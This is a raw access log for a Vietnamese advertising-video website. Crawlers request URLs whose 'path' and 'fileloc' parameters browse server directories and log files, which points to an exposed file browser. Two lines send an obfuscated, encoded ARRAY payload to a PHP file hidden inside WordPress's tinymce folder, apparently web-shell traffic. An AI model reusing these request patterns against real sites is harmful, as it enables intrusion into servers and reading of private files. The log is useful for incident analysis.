74.7.227.8 - - [16/Nov/2025:00:03:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:11 +0000] "GET /q-~89pfCFVdXAhogGJWEmU6BvIWuUgYHPso43808/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:12 +0000] "GET /q-~45oUiRzcJQdvZHeKwOwiQJExPEIy7cib18664/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory8/power HTTP/1.0" 200 3573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:13 +0000] "GET /q-~3LBCJX37HKQPoITHTctXvFSgvdRRTGZ48070/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:15 +0000] "GET /q-~90NnDusBAugcCj9fSWCRBrv7WsJKxqzp4393/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu1 HTTP/1.0" 200 3714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
23.23.137.202 - - [16/Nov/2025:00:03:16 +0000] "GET /our-works/intracom-riverside/?path=//sys/bus/platform/drivers/reg-dummy/reg-dummy/subsystem/drivers/reg-dummy HTTP/1.0" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:16 +0000] "GET /q-~15BdNBHQURSlofEju5kpkWXOQrqGxpuG47236/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu0 HTTP/1.0" 200 3683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:18 +0000] "GET /q-~111fbxUrwKDLeOodKGi5UlAJvnI2QZFId436/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu0/cache HTTP/1.0" 200 3444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
18.215.112.101 - - [16/Nov/2025:00:03:19 +0000] "GET /services/?path=//var/run/systemd/seats HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:19 +0000] "GET /q-~110nYIreRuFgVdKPsNutBDRgyATZFYRFg32563/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [16/Nov/2025:00:00:59 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343835392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313235392q3863383237316130356230613363643565343337663936356236623066353261222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:03:20 +0000] "GET /q-~33bzwokAZx8vFMzzJFlqxMmQBHEL2Nbm4958/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu1/power HTTP/1.0" 200 3660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:21 +0000] "GET /q-~176tRNiwTzsVMRGnhxXDrzydfnmg6uYXE4029/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu1/cache HTTP/1.0" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
44.206.93.215 - - [16/Nov/2025:00:03:22 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/devices/platform/reg-dummy/subsystem/drivers/reg-dummy/reg-dummy/subsystem/devices HTTP/1.0" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:22 +0000] "GET /q-~102eSNMnGDAFHBiNjcQXAmDOTjCVawjzY17519/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu0/power HTTP/1.0" 200 3655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:24 +0000] "GET /q-~239WnNKlpzJbYgQpxBUThuITCyeSVxFoY15944/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
217.113.194.40 - - [16/Nov/2025:00:03:24 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/feed-rss2.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 4302 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.8 - - [16/Nov/2025:00:03:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:25 +0000] "GET /q-~16oNCmxZqhytxDFSxT6KOKpShRcilQjx21789/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/firmware_node HTTP/1.0" 200 3603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:25 +0000] "GET /q-~14MZpswyhkqn5OdQdvuXTtfYoDVNHJwO29909/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:03:26 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fmail HTTP/1.0" 200 2871 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
18.209.201.119 - - [16/Nov/2025:00:03:26 +0000] "GET /our-works/tvc-jokky/?path=//sys/bus/platform/devices/reg-dummy/driver/reg-dummy/subsystem/drivers/syscon HTTP/1.0" 200 3312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:03:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/firmware_node HTTP/1.0" 200 3650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:27 +0000] "GET /?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.10.gz&path=/var/www/lamphim/data/logs HTTP/1.0" 200 2882 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:03:27 +0000] "GET /q-~67fsocpLvGzsEsP0HnxEAUsCIbOLWRRb14348/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:28 +0000] "GET /q-~291aoEPGyTdmstjuSfcGkyLOlPiWXmzhQ37040/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.143.51 - - [16/Nov/2025:00:03:28 +0000] "GET /q-~271wN9asrc2Ytc0sV3M1dXPL38smo5Dnb17982/ HTTP/1.0" 200 4804 "https://lamphimquangcao.net/sitemap998.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.8 - - [16/Nov/2025:00:03:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu1/power HTTP/1.0" 200 3655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:29 +0000] "GET /q-~13sKmBENVwHZRa2YbbFdQYxaDpSSTYbt30834/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/c6x/include/asm/procinfo.h&path=//lib/modules/5.4.0-214-generic/build/arch/c6x/include/asm HTTP/1.0" 200 3194 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.8 - - [16/Nov/2025:00:03:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu0/power HTTP/1.0" 200 3659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:30 +0000] "GET /q-~63LOfJCPJmMvCsHYg7QqRlzrcOzyZovA43626/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.203.111.15 - - [16/Nov/2025:00:03:31 +0000] "GET /our-works/tvc-jokky/?path=//sys/bus/platform/devices/reg-dummy/subsystem/drivers/reg-dummy/reg-dummy/power HTTP/1.0" 200 3561 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:03:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:31 +0000] "GET /q-~60NcGhr4oIOnTYxHOgCotxNDb9uoyjVM1217/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/csky/include/asm/fixmap.h&path=//lib/modules/5.4.0-214-generic/build/arch/csky/include/asm HTTP/1.0" 200 3239 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.8 - - [16/Nov/2025:00:03:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu1/cache HTTP/1.0" 200 3444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:32 +0000] "GET /q-~17Ftylz2VJYrNmTqoI0UYFORnlQGwCzs2814/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor/cpu0/cache HTTP/1.0" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:33 +0000] "GET /q-~157sPqyE0mrDbvHRbWobImzNlPPBiQOLc9018/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/cpu1/cache HTTP/1.0" 200 3413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:34 +0000] "GET /q-~93DDWNgUgBKnY1SJVvOTHQjGxZiFblxs19542/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/m68k/include/asm/intersil.h&path=//lib/modules/5.4.0-214-generic/build/arch/m68k/include/asm HTTP/1.0" 200 3295 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.85.126.86 - - [16/Nov/2025:00:03:35 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/tty/ttyS1/device/subsystem/devices/reg-dummy/subsystem/drivers HTTP/1.0" 200 4685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:03:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/driver/cpu1/driver HTTP/1.0" 200 3420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:37 +0000] "GET /q-~27QEdMOuWMBD6HzfYKdafGZLQo5GJItR7602/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/hugepages/hugepages-2048kB HTTP/1.0" 200 3340 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/microblaze/boot/dts/Makefile&path=//lib/modules/5.4.0-214-generic/build/arch/microblaze/boot/dts HTTP/1.0" 200 3098 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:03:40 +0000] "GET /q-~15XFtfZxhIjJmlbxWidwVMNbeFY4EJBr16644/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
184.73.239.35 - - [16/Nov/2025:00:03:40 +0000] "GET /our-works/?path=//lib/python3/dist-packages/cloudinit/net HTTP/1.0" 200 4026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:03:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/node0/power HTTP/1.0" 200 3588 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:03:41 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Fopt HTTP/1.0" 200 2870 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:03:42 +0000] "GET /q-~99utBAPyiZf5MimbsSoMdlgRCGtelsUE44802/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/cpu0/hotplug HTTP/1.0" 200 166 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/microblaze/include/asm/Kbuild&path=//lib/modules/5.4.0-214-generic/build/arch/microblaze/include/asm HTTP/1.0" 200 3167 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [16/Nov/2025:00:01:22 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343838312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313238312q6333313563623334363036393864643934623337643362383466313334373130222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
3.235.215.92 - - [16/Nov/2025:00:03:43 +0000] "GET /our-works/tvc-nuoc-mam-thai-long/?path=//lib/python3/dist-packages/oauthlib/openid/connect/__pycache__ HTTP/1.0" 200 3232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:44 +0000] "GET /q-~128eMyhDbxZkBRwtUVDQqglTWNfyPwciL32035/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/driver/cpu1 HTTP/1.0" 200 3707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:44 +0000] "GET /q-~112dZVZLzEItlHinXKueiyjsxOxnljrsJ27985/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory5/node0/cpu0/cache HTTP/1.0" 200 3414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.77.216.62 - - [16/Nov/2025:00:03:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//lib/modules/5.4.0-214-generic/build/arch/microblaze/include/asm/asm-compat.h&path=//lib/modules/5.4.0-214-generic/build/arch/microblaze/include/asm HTTP/1.0" 200 3144 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.215 - - [16/Nov/2025:00:03:45 +0000] "GET /q-~289WnNKlpzJbYgQpxBUThuITCyeSVxFoY15894/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory5/node0/cpu1/cache HTTP/1.0" 200 3414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
217.113.194.210 - - [16/Nov/2025:00:03:46 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/feed-atom.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 4062 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
